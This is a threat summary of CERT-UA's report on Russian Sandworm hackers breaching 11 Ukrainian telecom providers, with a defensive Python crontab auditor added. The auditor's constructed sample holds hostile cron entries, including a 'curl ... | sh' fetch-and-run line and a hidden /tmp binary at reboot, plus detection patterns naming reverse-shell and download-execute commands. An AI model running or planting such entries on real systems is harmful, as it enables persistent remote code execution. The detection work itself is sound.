Russian Sandworm Hackers Breached 11 Ukrainian Telcos Since May

Cyber Security Threat Summary:
“The state-sponsored Russian hacking group tracked as 'Sandworm' has compromised eleven telecommunication service providers in Ukraine between May and September 2023. That is based on a new report by Ukraine's Computer Emergency Response Team (CERT-UA) citing 'public resources' and information retrieved from some breached providers” (Bleeping Computer, 2023).

CERT-UA says that Russian hackers interfered with the communication systems of 11 telecommunication organizations in the country, which led to service interruptions and potential data breaches.

Sandworm actors performed reconnaissance on the companies' networks using a tool called “masscan”. Specifically, they looked for open ports and unprotected RDP or SSH interfaces that they could leverage to breach the network. Additionally, the attackers used tools like 'ffuf', 'dirbuster', 'gowitness', and 'nmap' to find potential vulnerabilities in web services that could be exploited to gain access. The group also compromised VPN accounts that were not protected by multi-factor authentication.

“To make their intrusions stealthier, Sandworm uses 'Dante', 'socks5', and other proxy servers to route their malicious activities through servers within the Ukrainian internet region they compromised previously, making it appear less suspicious” (Bleeping Computer, 2023). CERT-UA says the actors also used the Poemgate and Poseidon backdoors against the breached ISP systems.

  • Poemgate captures the credentials of admins who attempt to authenticate on the compromised endpoint, providing the attackers with access to additional accounts they can use for lateral movement or deeper network infiltration.
  • Poseidon is a Linux backdoor that the Ukrainian agency says "includes the full range of remote computer control tools." Persistence for Poseidon is achieved by modifying Cron to add rogue jobs.

To avoid detection, the group used a tool called “Whitecat” to remove artifacts and delete access logs. In the final stages of the attack, the hackers were seen deploying scripts that would cause service disruption, focusing especially on Mikrotik equipment, and wiping backups to make recovery more challenging.
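The cron-based persistence described for Poseidon leaves a trace that defenders can check for: a job that was not there before the intrusion window. The following script is an added example, not code from CERT-UA or the article, that audits a system crontab (/etc/crontab or /etc/cron.d format, with a user field) against a known-good baseline and flags new entries, noting commands that run from temporary directories or pipe a download into a shell. The baseline, the heuristics, and the sample crontab are all constructed for illustration.

```python
import re
from typing import Dict, List, Set

# Constructed baseline of known-good lines in /etc/crontab or /etc/cron.d format
# (minute hour dom mon dow user command). A real baseline would come from a
# snapshot taken before the intrusion window.
BASELINE: Set[str] = {
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly",
    "25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )",
}

# Constructed heuristics: command fragments that merit review in a new cron job.
SUSPICIOUS = [r"/tmp/", r"/dev/shm/", r"/var/tmp/", r"\b(curl|wget)\b.*\|\s*(ba)?sh\b",
              r"base64\s+(-d|--decode)", r"\bnc\b.*\s-e\s"]

# Five schedule fields, or an @reboot/@daily style shortcut, then user, then command.
CRON_LINE = re.compile(r"^(@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")

def audit_crontab(text: str, baseline: Set[str]) -> List[Dict[str, str]]:
    """Return one finding per non-baseline cron entry with the reason it was flagged."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        if "=" in line.split()[0]:
            continue  # environment assignment such as SHELL=/bin/sh
        if line in baseline:
            continue  # matches a known-good job exactly
        m = CRON_LINE.match(line)
        if not m:
            findings.append({"line": line, "user": "?", "reason": "unparseable entry"})
            continue
        user, cmd = m.group(2), m.group(3)
        hits = [p for p in SUSPICIOUS if re.search(p, cmd)]
        reason = "not in baseline" + ("; suspicious command pattern" if hits else "")
        findings.append({"line": line, "user": user, "reason": reason})
    return findings

# Constructed sample: the baseline jobs plus two additions of the kind described above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# system-wide crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
@reboot root /tmp/.cache/.x -d
*/5 * * * * root curl -s http://example.invalid/u | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, BASELINE):
        print(f"[{f['reason']}] user={f['user']}: {f['line']}")
```

Because Whitecat-style cleanup targets local logs, the baseline and the audit output should be stored off the host being checked.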

Security Officer Comments:
Sandworm is a sophisticated state-sponsored threat group linked to Russia’s GRU. It has an extensive history of attacking Ukrainian critical infrastructure. Notably, the group has been linked to the 2015 attacks against Ukraine’s power grid and the destructive NotPetya malware. Since the start of the Russia-Ukraine conflict, the group has been targeting Ukrainian entities with phishing lures, Android malware, and various data wipers.

CERT-UA has provided a best practice guide to all service providers in the country and urges those organizations to harden their systems against cyber intruders.